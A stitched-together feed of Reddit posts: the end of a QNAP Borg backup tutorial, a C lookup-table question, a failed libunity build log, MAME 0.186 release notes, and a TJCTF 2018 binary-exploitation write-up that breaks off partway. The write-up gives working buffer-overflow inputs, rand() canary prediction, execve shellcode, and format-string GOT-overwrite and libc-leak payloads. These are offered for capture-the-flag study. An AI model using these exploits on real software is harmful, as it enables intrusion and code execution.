#!/bin/bash log=”/persist/log/borg.log” mount -t nfs 192.168.1.200:/backup /mnt /persist/backup.sh 2>> $log echo ==========FINISH========== >> $log 
Save and try it. Stop container, and start it again. If you use “ls /mnt” you will see that the repository is no longer there. That is because the mounting point unmounted when you stopped the container. Now run
/persist/start.sh 
When it’s finished, a log file will appear inside /persist/log. It contains everything borg was previously putting in the screen, and you can check it using
cat /persist/log/borg.cat 
Everything is ready. All we need to do is is create a crontab job to automate this script whenever we want. You can read here how to edit crontab in QNAP (https://wiki.qnap.com/wiki/Add_items_to_crontab). Add this line to the crontab:
0 1 * * * docker start borgbackup && docker exec borgbackup -c /bin/bash “/persist/start.sh” && docker stop borgbackup 
That will launch container each day at 1:00 am, run the start.sh script, and stop the container when finished.

**EXTRA: RECOVERING OUR DATA**
In case you need to recover your data, you can use any device with Borg installed. There are two commands you can use: borg extract and borg mount. Borg extract will extract all files inside an archive into current directory. Borg mount will mount the repository so you can navigate it, and choose specific files you want to recover, much like NFS or SMB work.
Some examples:
borg extract /mnt::QNAP-2020-01-26T01-05-36 -> Extract all files from this specific backup time point into current directory borg mount /mnt::QNAP-2020-01-26T01-05-36 /recover -> Mounts this specific backup time point inside the /recover directory so you can navigate and search files inside borg mount /mnt /recover -> Mounts all backup time points inside the /recover directory. You can navigate inside all time points and recover whatever you want borg umount /recover -> Unmounts the repository from /recover 

I know this is a somewhat complicated tutorial, and sincerely, I don’t think there will be a lot of people interested, as Borg is for advanced users. That said, I had a ton of fun using borg and creating this tutorial. I hope it can help some people. I am conscious that like 99% of this community's users do not need advanced features and would do great using HB3... But TBH, I'm writing for that 1%.
Next up: I’m trying a duplicati container that it is supposed to have GUI, so… maybe the next tutorial will be a GUI based backup tool. How knows?
submitted by Vortax_Wyvern to qnap [link] [comments]

Hash Table for Embedded Systems?

Hi all,
I have a CSV file of about 1500 elements that maps a long integer (uint32_t) to a 128-char ASCII binary string. When I want to access one of these strings, I use a fairly simple lookup strategy that returns this bitstring in a char array, which I then convert to a series of hex values for storage in a struct.
This is incredibly inefficient, and does too much disk access. Ideally, I'd want to have a hash table implementation with all normal functions, plus an option to reload from a predefined location on disk, with the added constraint that it be optimized for an embedded system (64kiB RAM allotted, 1GHz CPU; though this is a really low priority task e.g. Maximum NICE level).
Here's a partial C implementation of the current lookup method that compiles under -Werror, -Wall, -Wpedantic:
// reading a text file #include  #include  #include  #include  #include  #include  #define MAX_LINE_LENGTH 100 #define NUM_BITS_PER_CMD 96 //give 2 pointers and mode as input void print_bitstring(char *p) { for (int i = 0; i < strlen(p); i++) { if(i % 4 == 0 && i) printf(" "); if(i % 8 == 0 && i) printf("\n"); printf("%c", p[i]); } } void expander(uint32_t mode, char *f_b, char *s_b) { memset((unsigned char *)f_b, 0, strlen(f_b)); memset((unsigned char *)s_b, 0, strlen(f_b)); char temp1[MAX_LINE_LENGTH], temp2[2*MAX_LINE_LENGTH]; // Converting incoming mode to a string // reference: https://stackoverflow.com/questions/2709713/how-to-convert-unsigned-long-to-string // u32_t format specifier found here: https://stackoverflow.com/questions/3168275/printf-format-specifiers-for-uint32-t-and-size-t const int n = snprintf(NULL, 0, "%"PRIu32"", mode); assert(n > 0); char input[n+1]; int c = snprintf(input, n+1, "%"PRIu32"", mode); assert(input[n] == '\0'); assert(c == n); char command[MAX_LINE_LENGTH], mode_id[MAX_LINE_LENGTH], *pt, *line = NULL; FILE *fp; size_t len = 0; ssize_t read; fp = fopen("./lookupTable.csv", "r"); if (fp != NULL) { // Reading in lookup table line by line // reference: https://stackoverflow.com/questions/3501338/c-read-file-line-by-line while ( (read = getline (&line, &len, fp)) != -1 ) { line[read - 1] = '\0'; char delimiter[] = ","; //size_t pos = 0; //mode_id = ""; // Read tokens from CSV file // reference: http://www.cplusplus.com/reference/cstring/strtok/ pt = strtok(line, delimiter); if (pt != NULL) { // Filling mode_id // reference: http://man7.org/linux/man-pages/man3/strcpy.3.html // I considered strlcpy, but strdup should work fine for our purposes. // mode_id = strdup(pt); strncpy(mode_id, pt, sizeof(mode_id)); #if(DEBUG) //printf("mode_id is %d bytes long.\n", strlen(mode_id)); #endif assert(mode_id != NULL); // strlcpy(mode_id, pt, MAX_LINE_LENGTH); pt = strtok(NULL, delimiter); } else { #if(DEBUG) printf("No comma found when parsing CSV! Exiting...\n"); #endif exit(EXIT_FAILURE); } if (pt != NULL) { strncpy(command, pt, sizeof(command)); //command = strdup(pt); assert(command != NULL); } else { #if(DEBUG) printf("No comma found when parsing CSV! Exiting...\n"); #endif exit(EXIT_FAILURE); } if(strcmp(input, mode_id) == 0) { #if(DEBUG) printf("Found a matching mode_id!\n"); #endif if(strlen(command) == NUM_BITS_PER_CMD) { strncpy(temp1, command, NUM_BITS_PER_CMD + 1); #if(DEBUG) printf("Copying command into f_b and s_b...\n"); #endif for(int i = 0; i < strlen(temp1); i++) { f_b[i]=temp1[i]; s_b[i]=temp1[i]; } } else { printf("Command was longer than %d bits. Detected length: %zu\n", NUM_BITS_PER_CMD, strlen(command)); printf("Command string:\n"); print_bitstring(command); strncpy(temp2, command, NUM_BITS_PER_CMD + 1); int j = 0; for(int i = 0; i < strlen(temp2); i++) { #if(DEBUG) if(i == 0) printf("Copying first %d bits into f_b\n", NUM_BITS_PER_CMD); if(i == NUM_BITS_PER_CMD) printf("Copying remaining %zu bits into s_b\n", strlen(temp2)-NUM_BITS_PER_CMD); #endif if(i < NUM_BITS_PER_CMD) { // Straightforward copy, maybe could just use strncpy? f_b[i]=temp2[i]; } else { // Overflows excess command bits into s_b s_b[j]=temp2[i]; j++; } } #if(DEBUG) if(j > 0) printf("Buffer contained %d extra bytes, copied into s_b\n", j); #endif } } } fclose(fp); } else { #if(DEBUG) printf("Unable to open file\n"); #endif exit(EXIT_FAILURE); } } int main (void) { uint32_t mode=1118074860;//32 bit mode ID // Corresponding shell command: grep 1118 lookupTable.csv | sed 's/.*,//' | sed -e "s/.\{8\}/&\n/g" char f_b[NUM_BITS_PER_CMD + 1], s_b[NUM_BITS_PER_CMD + 1]; //constant buffers to LIIB f_b[NUM_BITS_PER_CMD] = '\0'; s_b[NUM_BITS_PER_CMD] = '\0'; expander(mode, f_b, s_b); printf("Looping over first word (length: %zu)...\n", strlen(f_b)); print_bitstring(f_b); printf("\n"); printf("Looping over second word (length: %zu)...\n", strlen(s_b)); print_bitstring(s_b); return 0; } 
submitted by t40 to C_Programming [link] [comments]

Cannot install libunity via AUR usin g pacman

whenever i try to install libunity from AUR I get the following output and I have all dependencies installed:

Preparing...
Cloning libunity build files...
Checking libunity dependencies...
Building libunity...
==> Making package: libunity 7.1.4-8 (Thu 13 Jun 2019 11:52:26 PM EEST)
==> Checking runtime dependencies...
==> Checking buildtime dependencies...
==> Retrieving sources...
-> Found libunity_7.1.4+19.04.20190319.orig.tar.gz
==> Validating source files with sha256sums...
libunity_7.1.4+19.04.20190319.orig.tar.gz ... Passed
==> Removing existing $srcdi directory...
==> Extracting sources...
-> Extracting libunity_7.1.4+19.04.20190319.orig.tar.gz with bsdtar
==> Starting prepare()...
/usbin/gnome-autogen.sh
***Warning*** USE_GNOME2_MACROS is deprecated, you may remove it from autogen.sh
***Warning*** PKG_NAME is deprecated, you may remove it from autogen.sh
checking for automake >= 1.11.2...
testing automake... found 1.16.1
checking for autoreconf >= 2.53...
testing autoreconf... found 2.69
checking for intltool >= 0.25...
testing intltoolize... found 0.51.0
checking for pkg-config >= 0.14.0...
testing pkg-config... found 1.6.1
Checking for required M4 macros...
Processing ./configure.ac
Running intltoolize...
Running autoreconf...
autoreconf: Entering directory `.'
autoreconf: configure.ac: not using Gettext
autoreconf: running: aclocal --force --warnings=no-portability
autoreconf: configure.ac: tracing
autoreconf: running: libtoolize --copy --force
libtoolize: putting auxiliary files in '.'.
libtoolize: copying file './ltmain.sh'
libtoolize: putting macros in AC_CONFIG_MACRO_DIRS, 'm4'.
libtoolize: copying file 'm4/libtool.m4'
libtoolize: copying file 'm4/ltoptions.m4'
libtoolize: copying file 'm4/ltsugar.m4'
libtoolize: copying file 'm4/ltversion.m4'
libtoolize: copying file 'm4/lt~obsolete.m4'
libtoolize: Consider adding '-I m4' to ACLOCAL_AMFLAGS in Makefile.am.
autoreconf: running: /usbin/autoconf --force --warnings=no-portability
autoreconf: running: /usbin/autoheader --force --warnings=no-portability
autoreconf: running: automake --add-missing --copy --force-missing --warnings=no-portability
configure.ac:4: warning: AM_INIT_AUTOMAKE: two- and three-arguments forms are deprecated. For more info, see:
configure.ac:4: https://www.gnu.org/software/automake/manual/automake.html#Modernize-AM_005fINIT_005fAUTOMAKE-invocation
configure.ac:61: installing './compile'
configure.ac:65: installing './config.guess'
configure.ac:65: installing './config.sub'
configure.ac:4: installing './install-sh'
configure.ac:4: installing './missing'
bindings/python/Makefile.am:4: installing './py-compile'
examples/Makefile.am: installing './depcomp'
parallel-tests: installing './test-driver'
autoreconf: Leaving directory `.'
Skipping configure process.
==> Removing existing $pkgdi directory...
==> Starting build()...
checking for a BSD-compatible install... /usbin/install -c
checking whether build environment is sane... yes
checking for a thread-safe mkdir -p... /usbin/mkdir -p
checking for gawk... gawk
checking whether make sets $(MAKE)... yes
checking whether make supports nested variables... yes
checking whether to enable maintainer-specific portions of Makefiles... no
checking whether make supports nested variables... (cached) yes
checking whether make supports the include directive... yes (GNU style)
checking for gcc... gcc
checking whether the C compiler works... yes
checking for C compiler default output file name... a.out
checking for suffix of executables...
checking whether we are cross compiling... no
checking for suffix of object files... o
checking whether we are using the GNU C compiler... yes
checking whether gcc accepts -g... yes
checking for gcc option to accept ISO C89... none needed
checking whether gcc understands -c and -o together... yes
checking dependency style of gcc... gcc3
checking for library containing strerror... none required
checking for gcc... (cached) gcc
checking whether we are using the GNU C compiler... (cached) yes
checking whether gcc accepts -g... (cached) yes
checking for gcc option to accept ISO C89... (cached) none needed
checking whether gcc understands -c and -o together... (cached) yes
checking dependency style of gcc... (cached) gcc3
checking for gcc... (cached) gcc
checking whether we are using the GNU C compiler... (cached) yes
checking whether gcc accepts -g... (cached) yes
checking for gcc option to accept ISO C89... (cached) none needed
checking whether gcc understands -c and -o together... (cached) yes
checking dependency style of gcc... (cached) gcc3
checking how to run the C preprocessor... gcc -E
checking for grep that handles long lines and -e... /usbin/grep
checking for egrep... /usbin/grep -E
checking for ANSI C header files... yes
checking build system type... x86_64-pc-linux-gnu
checking host system type... x86_64-pc-linux-gnu
checking how to print strings... printf
checking for a sed that does not truncate output... /usbin/sed
checking for fgrep... /usbin/grep -F
checking for ld used by gcc... /usbin/ld
checking if the linker (/usbin/ld) is GNU ld... yes
checking for BSD- or MS-compatible name lister (nm)... /usbin/nm -B
checking the name lister (/usbin/nm -B) interface... BSD nm
checking whether ln -s works... yes
checking the maximum length of command line arguments... 1572864
checking how to convert x86_64-pc-linux-gnu file names to x86_64-pc-linux-gnu format... func_convert_file_noop
checking how to convert x86_64-pc-linux-gnu file names to toolchain format... func_convert_file_noop
checking for /usbin/ld option to reload object files... -r
checking for objdump... objdump
checking how to recognize dependent libraries... pass_all
checking for dlltool... no
checking how to associate runtime and link libraries... printf %s\n
checking for ar... ar
checking for archiver @FILE support... @
checking for strip... strip
checking for ranlib... ranlib
checking command to parse /usbin/nm -B output from gcc object... ok
checking for sysroot... no
checking for a working dd... /usbin/dd
checking how to truncate binary pipes... /usbin/dd bs=4096 count=1
checking for mt... no
checking if : is a manifest tool... no
checking for sys/types.h... yes
checking for sys/stat.h... yes
checking for stdlib.h... yes
checking for string.h... yes
checking for memory.h... yes
checking for strings.h... yes
checking for inttypes.h... yes
checking for stdint.h... yes
checking for unistd.h... yes
checking for dlfcn.h... yes
checking for objdir... .libs
checking if gcc supports -fno-rtti -fno-exceptions... no
checking for gcc option to produce PIC... -fPIC -DPIC
checking if gcc PIC flag -fPIC -DPIC works... yes
checking if gcc static flag -static works... yes
checking if gcc supports -c -o file.o... yes
checking if gcc supports -c -o file.o... (cached) yes
checking whether the gcc linker (/usbin/ld -m elf_x86_64) supports shared libraries... yes
checking whether -lc should be explicitly linked in... no
checking dynamic linker characteristics... GNU/Linux ld.so
checking how to hardcode library paths into programs... immediate
checking whether stripping libraries is possible... yes
checking if libtool supports shared libraries... yes
checking whether to build shared libraries... yes
checking whether to build static libraries... no
checking for valac... /usbin/valac
checking whether /usbin/valac is at least version 0.31.1... yes
checking for python... /usbin/python
checking for python version... 3.7
checking for python platform... linux
checking for python script directory... ${prefix}/lib/python3.7/site-packages
checking for python extension module directory... ${exec_prefix}/lib/python3.7/site-packages
checking for pygobject overrides directory... /uslib/python3.7/site-packages/gi/overrides
checking for gobject-introspection m4 macros... yes
checking for pkg-config... /usbin/pkg-config
checking pkg-config is at least version 0.9.0... yes
checking for gobject-introspection... yes
checking whether NLS is requested... yes
checking for intltool >= 0.40.0... 0.51.0 found
checking for intltool-update... /usbin/intltool-update
checking for intltool-merge... /usbin/intltool-merge
checking for intltool-extract... /usbin/intltool-extract
checking for xgettext... /usbin/xgettext
checking for msgmerge... /usbin/msgmerge
checking for msgfmt... /usbin/msgfmt
checking for gmsgfmt... /usbin/msgfmt
checking for perl... /usbin/perl
checking for perl >= 5.8.1... 5.28.2
checking for XML::Parser... ok
checking for xvfb-run... no
checking for dbus-run-session... /usbin/dbus-run-session
checking for GLIB2... yes
checking for GOBJECT2... yes
checking for GIO2... yes
checking for GIO_UNIX2... yes
checking for DEE... yes
checking for DBUSMENU... yes
checking for GTK3... yes
checking for GMODULE... yes
checking for LTTNG... no
checking for glib-compile-resources... /usbin/glib-compile-resources
checking for glib-mkenums... /usbin/glib-mkenums
checking for glib-genmarshal... /usbin/glib-genmarshal
checking for pkg-config... (cached) /usbin/pkg-config
checking pkg-config is at least version 0.16... yes
checking that generated files are newer than configure... done
configure: creating ./config.status
config.status: creating unity.pc
config.status: creating unity-protocol-private.pc
config.status: creating unity-extras.pc
config.status: creating Makefile
config.status: creating bindings/Makefile
config.status: creating bindings/python/Makefile
config.status: creating data/com.canonical.Unity.Lenses.gschema.xml.in
config.status: creating data/Makefile
config.status: creating doc/Makefile
config.status: creating doc/reference/Makefile
config.status: creating examples/Makefile
config.status: creating po/Makefile.in
config.status: creating protocol/Makefile
config.status: creating src/Makefile
config.status: creating extras/Makefile
config.status: creating loadeMakefile
config.status: creating tools/Makefile
config.status: creating test/Makefile
config.status: creating test/C/Makefile
config.status: creating test/vala/Makefile
config.status: creating test/python/Makefile
config.status: creating vapi/Makefile
config.status: creating config.h
config.status: executing depfiles commands
config.status: executing libtool commands
config.status: executing po/stamp-it commands
configure:

libunity v7.1.4 (soname 9:2:0)
(protocol soname 0:0:0)
------------------------------

Build environment
Prefix : /usr
Build GI typelib : yes
Documentation : no
C warnings : no
Trace logging : no
LTTNG tracepoints : no

Testing
Integration tests : no
Headless tests : yes
Coverage reporting : no

make all-recursive
make[1]: Entering directory '/home/omarabu-amara/pamac-build/libunity/src'
Making all in data
make[2]: Entering directory '/home/omarabu-amara/pamac-build/libunity/src/data'
ITMRG com.canonical.Unity.Lenses.gschema.xml
GEN com.canonical.Unity.Lenses.gschema.valid
make[2]: Leaving directory '/home/omarabu-amara/pamac-build/libunity/src/data'
Making all in protocol
make[2]: Entering directory '/home/omarabu-amara/pamac-build/libunity/src/protocol'
GEN libunity_protocol_private_la_vala.stamp
protocol-scope-discovery.vala:24.3-24.40: warning: the modifier `static' is not applicable to constants
private static const string SCOPES_DIR = "unity/scopes";
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
protocol-scope-discovery.vala:190.5-190.43: warning: the modifier `static' is not applicable to constants
private static const string SCOPE_GROUP = "Scope";
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
protocol-scope-discovery.vala:191.5-191.45: warning: the modifier `static' is not applicable to constants
private static const string DESKTOP_GROUP = "Desktop Entry";
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
protocol-scope-discovery.vala:902.5-902.49: warning: the modifier `static' is not applicable to constants
private static const string SCOPE_GROUP_GROUP = "Scope Group";
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
protocol-preview-player.vala:41.3-41.46: warning: the modifier `static' is not applicable to constants
static const string PREVIEW_PLAYER_DBUS_NAME = "com.canonical.Unity.Lens.Music.PreviewPlayer";
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
protocol-preview-player.vala:42.3-42.46: warning: the modifier `static' is not applicable to constants
static const string PREVIEW_PLAYER_DBUS_PATH = "/com/canonical/Unity/Lens/Music/PreviewPlayer";
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
dee-1.0.vapi:44.35-44.44: error: construct properties not supported for specified property type
 public Dee.Filter filter { get; construct; } 
^^^^^^^^^^
dee-1.0.vapi:76.35-76.44: error: construct properties not supported for specified property type
 public Dee.ModelReader reader { construct; } 
^^^^^^^^^^
protocol-scope-interface.vala:117.3-117.51: warning: DBus methods are recommended to throw at least `GLib.Error' or `GLib.DBusError, GLib.IOError'
public abstract async ActivationReplyRaw activate (
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
protocol-scope-interface.vala:124.3-124.57: warning: DBus methods are recommended to throw at least `GLib.Error' or `GLib.DBusError, GLib.IOError'
public abstract async HashTable search (
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
protocol-scope-interface.vala:130.3-130.43: warning: DBus methods are recommended to throw at least `GLib.Error' or `GLib.DBusError, GLib.IOError'
public abstract async string open_channel (
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
protocol-scope-interface.vala:137.3-137.42: warning: DBus methods are recommended to throw at least `GLib.Error' or `GLib.DBusError, GLib.IOError'
public abstract async void close_channel (
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
protocol-scope-interface.vala:142.3-142.63: warning: DBus methods are recommended to throw at least `GLib.Error' or `GLib.DBusError, GLib.IOError'
public abstract async HashTable push_results (
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
protocol-scope-interface.vala:151.3-151.42: warning: DBus methods are recommended to throw at least `GLib.Error' or `GLib.DBusError, GLib.IOError'
public abstract async void set_view_type (uint view_type) throws IOError;
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Command-line option `--thread` is deprecated and will be ignored
Compilation failed: 2 error(s), 12 warning(s)
make[2]: *** [Makefile:957: libunity_protocol_private_la_vala.stamp] Error 1
make[2]: Leaving directory '/home/omarabu-amara/pamac-build/libunity/src/protocol'
make[1]: *** [Makefile:571: all-recursive] Error 1
make[1]: Leaving directory '/home/omarabu-amara/pamac-build/libunity/src'
make: *** [Makefile:475: all] Error 2
==> ERROR: A failure occurred in build().
Aborting...
submitted by ogaa123 to ManjaroLinux [link] [comments]

MAME 0.186 has been released!

MAME 0.186

It’s been one of those long, five-week development cycles, but it’s finally time for your monthly MAME fix. There’s been a lot of touched in this release, with improvements in a number of areas. But before we get to the improvements, we have an embarrassing admission to make: the game added in 0.185 as Acchi Muite Hoi is actually Pata Pata Panic, and the sound ROM mapping was incorrect, making the game unplayable. That’s all sorted out now though, thanks to occasional contributor k2.
New working arcade games include Epos Revenger ’84, Jockey Club II, Hashire Patrol Car, the Mega Play version of Gunstar Heroes, and the much-awaited Taito Classic Space Cyclone. Improvements to emulation make Legionnaire and Heated Barrel fully playable at long last, and Megatouch XL 6000 is working in this release. There are also plenty of new versions of supported games, including a world release of the puzzle game Star Sweep, the Taito licensed version of Bagman, the Japanese release of Top Landing, the Italian release of Penky, and European bootlegs of Amidar and Phoenix. We’ve got some exciting improvements to supported arcade games this month, too. Sound effects for Universal’s Cheeky Mouse are now supported, and the analog section of the melody synthesiser used in Zaccaria’s Jack Rabbit and Money Money has been implemented, although it’s still missing the cassa (bass drum) sound at the moment. We need schematics and quality PCB photos to add support for analog sound synthesis in more games, so if you find any we’d really appreciate if you could send them our way.
New working home/handheld games include Jungle Soft Zone 60, Gradius, Lone ranger, Teenage Mutant Ninja Turtles, Top Gun, and the Game & Watch titles Mario’s Cement Factory, Boxing, Donkey Kong II and Mickey & Donald. The CoCo Games master cartridge is supported as a CoCo slot device, support for the French Minitel 2 terminal has been added (thanks to Jean-François Del Nero), and there’s some more progress on the InterPro systems from Patrick Mackinlay. Peripherals for the TI-99 home computer family have been overhauled, making the PEB a slot device that plugs into the I/O port – this will require changes to your configuration if you use this family of computers.
Finally, the -listroms verb supports device sets (e.g. mpu401 or m68705p3), -listroms, -verifyroms and -listxml support multiple patterns on the command line, -verifyroms is much faster when a small number of sets are specified, and the romcmp tool has seen several improvements.
Get the source/Windows binaries from the download page and enjoy all the improvements. Thanks for continuing to use and support the one and only MAME.

MAMETesters Bugs Fixed

New working machines

New working clones

Machines promoted to working

Clones promoted to working

New machines marked as NOT_WORKING

New clones marked as NOT_WORKING

New working software list additions

New NOT_WORKING software list additions

Translations added or modified

Source Changes

submitted by cuavas to emulation [link] [comments]

TJCTF 2018 - Binary Exploitation Guide

Hello, I am pretty new here and I just create a full guide for all pwn challenges from TJCTF.
I hope you'll enjoy them, here is the original link on medium: https://medium.com/@mihailferaru2000/tjctf-2018-full-binary-exploitation-walk-through-a72a9870564e

Math Whiz

We have a simple binary that will show us the flag if we could become admin.
if (admin) { printf("Successfully registered '%s' as an administrator account!\n", username); printf("Here is your flag: %s\n", FLAG); } else { printf("Successfully registered '%s' as an user account!\n", username); } 
But the admin variable is not set anywhere, so we need to pwn it. It will be pretty easy as we have the source code provided. If we take a look at the input function, we observe that it reads specified size multiplied by 16. The most obvious buffer overflow is when the PIN code gets read:
input(recoverypin, 4); 
This means that we read 64 bytes in a 4-byte array. We also see that the admin variable is declared before the buffers, so the question is how could we override it? Lucky enough, modern compilers move buffers before any other variables in order to get them way from the return pointer, but in our case, we are in advantage. Finally, any input larger than 52 bytes will provide us this beauty: tjctf{d4n63r0u5_buff3r_0v3rfl0w5}

Tilted Troop

We’ve got a binary that should read 8 team members with random strengths and simulate a battle with some fantastic creature. If the sum of strengths is our goal (400 in this case), we will get the flag. Again, we have the source code, so our life is a lot easier when we don’t have to disassemble. We see that the array of strengths is kept right after the array of names and maybe we could override somehow.
Checking how bound checks are done, we can spot a bug:
if(t.teamSize > MAX_TEAM_SIZE) 
Array indexing starts from 0, so from 0 to MAX_TEAM_SIZE there are MAX_TEAM_SIZE + 1 elements. We need to create 8 members in our team and then just override the strength variable.
for i in range(4): io.recvline() for i in range(8): io.sendline('A test') # this will override strength buffer # 'd' = 100 => 'd' * 4 = 400 io.sendline('A dddd') io.sendline('F') io.interactive() 
And here it is: tjctf{0oPs_CoMP4Ri5ONs_r_h4rD}
Full solution: https://github.com/JustBeYou/ctfs/blob/mastetjctf2018/strover.py

Future Canary Lab

Again, we have to deal with variable overriding, but this time we have some kind of protection:
// canary generation for (i = 0; i < 10; ++i) { canary[i] = check[i] = rand(); } // ... // canary check for (j = 0; j < 10; ++j) { if (canary[j] != check[j]) { printf("Alas, it would appear you lack the time travel powers we desire.\n"); exit(0); } } 
If you are familiar with stack canaries (or stack cookies) you easily recognize that this is a handmade implementation. As rand() is not a secure function, we could reproduce its return values for sure. In the **main() **function we see that it is initialized with the seed of current time, so it is pretty vulnerable. Using the current time when we connect to the server as the seed, we can generate the values from the canary. Here we have a little C program to generate 10 random values based on our seed:
int main(int argc, char **argv) { int seed = atoi(argv[1]); srand(seed); for (int i = 0; i <= 9; i++) { printf("%d\n", rand()); } return 0; } 
Now, as we bypassed the canary, we need to satisfy the following condition:
if (secret - i + j == 0xdeadbeef) 
secret is always 0, i could be overridden by us and j is always 10, so we need to override i with 0x2152411b to solve the equation.
At the end we have: tjctf{3l_p5y_k0n6r00_0ur_n3w357_l4b_m3mb3r!}
Full solution: https://github.com/JustBeYou/ctfs/blob/mastetjctf2018/interview.py
We were given a small demo banking system. We have the source code, so a vulnerability will be pretty easy to spot. At first it looks pretty secure, but if we take a look at the verify_pin() function we see a clear buffer overflow. Let’s run a checksec to see what protection does this binary implies:
[[email protected] tjctf2018]$ checksec problem [*] '/home/littlewho/ctfs/tjctf2018/problem' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x400000) RWX: Has RWX segments 
It does not have any stack canary or any other execution prevention, so the solution is straightforward. The name array is global so it is stored in the BSS section and we know its address: 0x6010A0. We could store our shellcode here and then use the overflow to jump here.
; execve(["/bin/sh",], [], []) bits 64 push 0x68 mov rax, 0x732f2f6e69622f2f push rax mov rdi, rsp xor rsi, rsi xor rdx, rdx xor r10, r10 mov rax, 0x3b syscall 
Compile it as raw binary using nasm in order to easily use it. The layout of the attack vector is:
4 chars for PIN + 13 bytes to fill the buffer and the RBP + RIP 
Running the exploit
Flag: tjctf{d4n6_17_y0u_r0pp3d_m3_:(}
Full solution: https://github.com/JustBeYou/ctfs/blob/mastetjctf2018/problem.py

Secure Secrets

Challenges until now were pretty easy, the real fun starts now. Don’t get scary, they are still easy, but they need a little bit more amount of work than others as we don’t have the source code anymore and we need to do format string exploitation.
Running the application
This is how the application looks. It just reads a password and a message then shows the message. Let’s open the binary in IDA Pro (or Hopper). Both of them could generate pseudo-code of the program (press F5 in IDA or search in top menu of Hopper), but for now let’s analyze some Assembly.
We don’t see any buffer overflow, but the following code from get_message() looks interesting:
.text:0804885D mov eax, [ebp+arg_0] .text:08048860 mov [ebp+var_2C], eax ... .text:080488EC push [ebp+var_2C] ; format .text:080488EF call _printf .text:080488F4 add esp, 10h 
var_2C is the argument passed to the function and it represents our message and it is passed directly to printf() and that means: format string vulnerability! The scenario could be classic: leak libc, overwrite some function GOT with system, pass “/bin/sh” to it and get the flag, but it is even easier, after investigating the binary a little bit more we see another function named get_secret() that has some pretty interesting code in it:
.text:08048727 push offset modes ; "r" .text:0804872C push offset filename ; "flag.txt" .text:08048731 call _fopen 
So it is clear, we need to overwrite some GOT entry with the address of this function. I will chose **puts() **as it is called after our exploit few times. We need to write 0x08048713 (get_secret) at 0x0804A028 ([email protected]) in order to get the flag. We will use 2 writes of 2 bytes. (if you are not familiar with this type of exploit read this and watch this) Before we craft our exploit, we need to know where our controlled is in order to pop addresses from it. If we set a breakpoint before the printf at 0x080488EF and dump the stack, we will see that %35$x is our buffer.
This is a short explanation for those who don’t understand how I got that number. Open the executable in GDB and put a breakpoint at that printf. Input something like this in the message: *AAAABBBB %x %x %x *and now continue. When the breakpoint is hit, dump the stack then step to the next instruction. The printf output will be something like:
AAAABBBB ffffc5ec f7fa05c0 fbad2887 
Now let’s search those values in the stack dump.
https://preview.redd.it/s3z41w6k4uf11.png?width=380&format=png&auto=webp&s=df5851f8c46c152453bccda96d78524a5f4e4734
In the first square, we have the dumped values by printf and in the second one the actual buffer. The distance from first printed argument to the buffer is of 35 arguments. So, when we will want to overwrite few addresses using **%n **format argument, we will put those addresses at the beginning of our buffer and we will use %$n syntax to access them. Let’s proceed further.
Using python I generated the payload in a pretty manner:
arg_off = 35 puts_GOT = 0x0804A028 get_secret_ADDR = 0x08048713 write1 = 0x0804 - 8 write2 = 0x8713 - write1 - 8 payload = p32(puts_GOT + 2) + p32(puts_GOT) + "%{}x%{}$hn%{}x%{}$hn".format(write1, arg_off, write2, arg_off + 1) 
First we write the bytes with a smaller value and then the rest. After running it we get: tjctf{n1c3_j0b_y0u_r34lly_GOT_m3_600d}
Full solution: https://github.com/JustBeYou/ctfs/blob/mastetjctf2018/secure.py

Super Secure Secrets

Running the application
We have almost the same challenge, but with improved security, so let’s do some standard checks.
Checks
Now, there is no get_secret() function, we have no buffer overflow, but we still have the same format string vulnerability in the view message functionality. We need to follow a classic scenario:
Leaking the libc implies dumping the stack before the printf and investigate if we have any libc address that could be accessed by our %$p trick. As we are using a 64-bit binary, first 5 arguments are passed using registers, so stack arguments start at 6. Let’s use *%6$p %7$p %8$p *to dump few values:
0x7fffffffd390 0x7fffffffd3b0 0x100000000 
Leaked arguments
Here we have the values we printed. Looking ahead we see this:
Libc address onto the stack
By dividing 0x1d8 offset by pointer size on 64-bit arch (8 bytes) we get the position 65. So at %65$p we have __libc_start_main+ and we can leak the base address of libc. Now, we have to problems ahead:
Let’s solve them one by one. So, we have two options to get the version of libc, first would be to leak the argument 65 on the webserver, take its signature (last 3 digits) and use https://libc.blukat.me/ or https://github.com/niklasb/libc-database to find the version. In that case, the leaked address is 0x7fdf0a8a7b97 (it changes every time, only the last digits remain, this is just an example) and its signature is b97. The second option is to use an already solved pwn challenge to connect to the server and leak the libc version, it is not very fair play, but remember this trick, it is very useful in some CTFs with esoteric libc versions.
Both solutions lead to the same answer: libc6_2.27–3ubuntu1_amd64
Searching for libc
The offset of specified symbol is 0x21b97, so now we have the base address when we want, but we still need to force the program not to close. Let’s investigate the code after we run our exploit. (I used IDA to decompile)
unsigned __int64 __fastcall get_message(char *a1, const char *a2) { // ... code before this is not relevant printf(a1, &s, a2); puts("===================="); for ( i = 0; i <= 5; ++i ) v4[i] = byte_401238[rand() % 62]; v5 = 0; puts("As a free trial user, please complete the following captcha for our monitoring purposes."); printf("Captcha: %s\n", v4); fgets(&s2, 7, stdin); if ( !strcmp(v4, &s2) ) { puts("Thank you for your cooperation..."); } else { memset(a1, 0, 0x80uLL); puts("Incorrect captcha, your message was removed from our database."); } return __readfsqword(0x28u) ^ v8; } 
After this function returns, the program closes. The simplest solution is to overwrite the GOT of a function that is called before the exit and return to the beginning of the program. As memset() is not used in the rest of the program let’s rewrite its GOT with 0x400DA0 (the address where the menu is printed and the interaction starts).
